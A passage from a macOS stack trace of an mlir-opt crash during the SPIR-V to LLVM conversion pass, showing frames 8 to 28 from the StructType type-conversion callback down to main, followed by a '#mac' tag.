8  mlir-opt                 0x000000010332d334 std::\_\_1::\_\_function::\_\_func<std::\_\_1::enable\_if<std::is\_invocable\_v<mlir::populateSPIRVToLLVMTypeConversion(mlir::LLVMTypeConverter&)::$\_5, mlir::spirv::StructType, llvm::SmallVectorImpl<mlir::Type>&, llvm::ArrayRef<mlir::Type>>, std::\_\_1::function<std::\_\_1::optional<mlir::LogicalResult> (mlir::Type, llvm::SmallVectorImpl<mlir::Type>&, llvm::ArrayRef<mlir::Type>)>>::type mlir::TypeConverter::wrapCallback<mlir::spirv::StructType, std::\_\_1::enable\_if<std::is\_invocable\_v<mlir::populateSPIRVToLLVMTypeConversion(mlir::LLVMTypeConverter&)::$\_5, mlir::spirv::StructType>, std::\_\_1::function<std::\_\_1::optional<mlir::LogicalResult> (mlir::Type, llvm::SmallVectorImpl<mlir::Type>&, llvm::ArrayRef<mlir::Type>)>>::type mlir::TypeConverter::wrapCallback<mlir::spirv::StructType, mlir::populateSPIRVToLLVMTypeConversion(mlir::LLVMTypeConverter&)::$\_5>(mlir::populateSPIRVToLLVMTypeConversion(mlir::LLVMTypeConverter&)::$\_5&&)::'lambda'(mlir::spirv::StructType, llvm::SmallVectorImpl<mlir::Type>&, llvm::ArrayRef<mlir::Type>)>(mlir::populateSPIRVToLLVMTypeConversion(mlir::LLVMTypeConverter&)::$\_5&&)::'lambda'(mlir::Type, llvm::SmallVectorImpl<mlir::Type>&, llvm::ArrayRef<mlir::Type>), std::\_\_1::allocator<std::\_\_1::enable\_if<std::is\_invocable\_v<mlir::populateSPIRVToLLVMTypeConversion(mlir::LLVMTypeConverter&)::$\_5, mlir::spirv::StructType, llvm::SmallVectorImpl<mlir::Type>&, llvm::ArrayRef<mlir::Type>>, std::\_\_1::function<std::\_\_1::optional<mlir::LogicalResult> (mlir::Type, llvm::SmallVectorImpl<mlir::Type>&, llvm::ArrayRef<mlir::Type>)>>::type mlir::TypeConverter::wrapCallback<mlir::spirv::StructType, std::\_\_1::enable\_if<std::is\_invocable\_v<mlir::populateSPIRVToLLVMTypeConversion(mlir::LLVMTypeConverter&)::$\_5, mlir::spirv::StructType>, std::\_\_1::function<std::\_\_1::optional<mlir::LogicalResult> (mlir::Type, llvm::SmallVectorImpl<mlir::Type>&, llvm::ArrayRef<mlir::Type>)>>::type mlir::TypeConverter::wrapCallback<mlir::spirv::StructType, mlir::populateSPIRVToLLVMTypeConversion(mlir::LLVMTypeConverter&)::$\_5>(mlir::populateSPIRVToLLVMTypeConversion(mlir::LLVMTypeConverter&)::$\_5&&)::'lambda'(mlir::spirv::StructType, llvm::SmallVectorImpl<mlir::Type>&, llvm::ArrayRef<mlir::Type>)>(mlir::populateSPIRVToLLVMTypeConversion(mlir::LLVMTypeConverter&)::$\_5&&)::'lambda'(mlir::Type, llvm::SmallVectorImpl<mlir::Type>&, llvm::ArrayRef<mlir::Type>)>, std::\_\_1::optional<mlir::LogicalResult> (mlir::Type, llvm::SmallVectorImpl<mlir::Type>&, llvm::ArrayRef<mlir::Type>)>::operator()(mlir::Type&&, llvm::SmallVectorImpl<mlir::Type>&, llvm::ArrayRef<mlir::Type>&&) + 776
9  mlir-opt                 0x000000010363a9e4 mlir::TypeConverter::convertType(mlir::Type, llvm::SmallVectorImpl<mlir::Type>&) + 764
10 mlir-opt                 0x000000010363f0f4 mlir::TypeConverter::convertType(mlir::Type) + 64
11 mlir-opt                 0x0000000103346d14 (anonymous namespace)::GlobalVariablePattern::matchAndRewrite(mlir::spirv::GlobalVariableOp, mlir::spirv::GlobalVariableOpAdaptor, mlir::ConversionPatternRewriter&) const + 124
12 mlir-opt                 0x0000000102f78af4 mlir::OpConversionPattern<mlir::spirv::GlobalVariableOp>::matchAndRewrite(mlir::Operation\*, llvm::ArrayRef<mlir::Value>, mlir::ConversionPatternRewriter&) const + 144
13 mlir-opt                 0x000000010363ee34 mlir::ConversionPattern::matchAndRewrite(mlir::Operation\*, mlir::PatternRewriter&) const + 200
14 mlir-opt                 0x000000010389bbd0 mlir::PatternApplicator::matchAndRewrite(mlir::Operation\*, mlir::PatternRewriter&, llvm::function\_ref<bool (mlir::Pattern const&)>, llvm::function\_ref<void (mlir::Pattern const&)>, llvm::function\_ref<mlir::LogicalResult (mlir::Pattern const&)>) + 1440
15 mlir-opt                 0x00000001036494b0 (anonymous namespace)::OperationLegalizer::legalize(mlir::Operation\*, mlir::ConversionPatternRewriter&) + 1948
16 mlir-opt                 0x0000000103642b1c (anonymous namespace)::OperationConverter::convertOperations(llvm::ArrayRef<mlir::Operation\*>, llvm::function\_ref<void (mlir::Diagnostic&)>) + 928
17 mlir-opt                 0x0000000103644d18 mlir::applyPartialConversion(mlir::Operation\*, mlir::ConversionTarget&, mlir::FrozenRewritePatternSet const&, llvm::DenseSet<mlir::Operation\*, llvm::DenseMapInfo<mlir::Operation\*, void>>\*) + 80
18 mlir-opt                 0x000000010334dc20 (anonymous namespace)::ConvertSPIRVToLLVMPass::runOnOperation() + 600
19 mlir-opt                 0x00000001036074dc mlir::detail::OpToOpPassAdaptor::run(mlir::Pass\*, mlir::Operation\*, mlir::AnalysisManager, bool, unsigned int) + 420
20 mlir-opt                 0x0000000103607a0c mlir::detail::OpToOpPassAdaptor::runPipeline(mlir::OpPassManager&, mlir::Operation\*, mlir::AnalysisManager, bool, unsigned int, mlir::PassInstrumentor\*, mlir::PassInstrumentation::PipelineParentInfo const\*) + 320
21 mlir-opt                 0x0000000103609388 mlir::PassManager::run(mlir::Operation\*) + 1148
22 mlir-opt                 0x0000000103602840 performActions(llvm::raw\_ostream&, bool, bool, std::\_\_1::shared\_ptr<llvm::SourceMgr> const&, mlir::MLIRContext\*, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, bool, bool) + 504
23 mlir-opt                 0x0000000103602410 mlir::LogicalResult llvm::function\_ref<mlir::LogicalResult (std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&)>::callback\_fn<mlir::MlirOptMain(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, mlir::DialectRegistry&, bool, bool, bool, bool, bool, bool, bool)::$\_0>(long, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&) + 704
24 mlir-opt                 0x000000010366d02c mlir::splitAndProcessBuffer(std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::function\_ref<mlir::LogicalResult (std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::raw\_ostream&)>, llvm::raw\_ostream&, bool, bool) + 656
25 mlir-opt                 0x0000000103600838 mlir::MlirOptMain(llvm::raw\_ostream&, std::\_\_1::unique\_ptr<llvm::MemoryBuffer, std::\_\_1::default\_delete<llvm::MemoryBuffer>>, llvm::function\_ref<mlir::LogicalResult (mlir::PassManager&)>, mlir::DialectRegistry&, bool, bool, bool, bool, bool, bool, bool) + 216
26 mlir-opt                 0x0000000103600d2c mlir::MlirOptMain(int, char\*\*, llvm::StringRef, mlir::DialectRegistry&, bool) + 1208
27 mlir-opt                 0x000000010229f0a0 main + 108
28 dyld                     0x0000000106ad5088 start + 516

Tag

#mac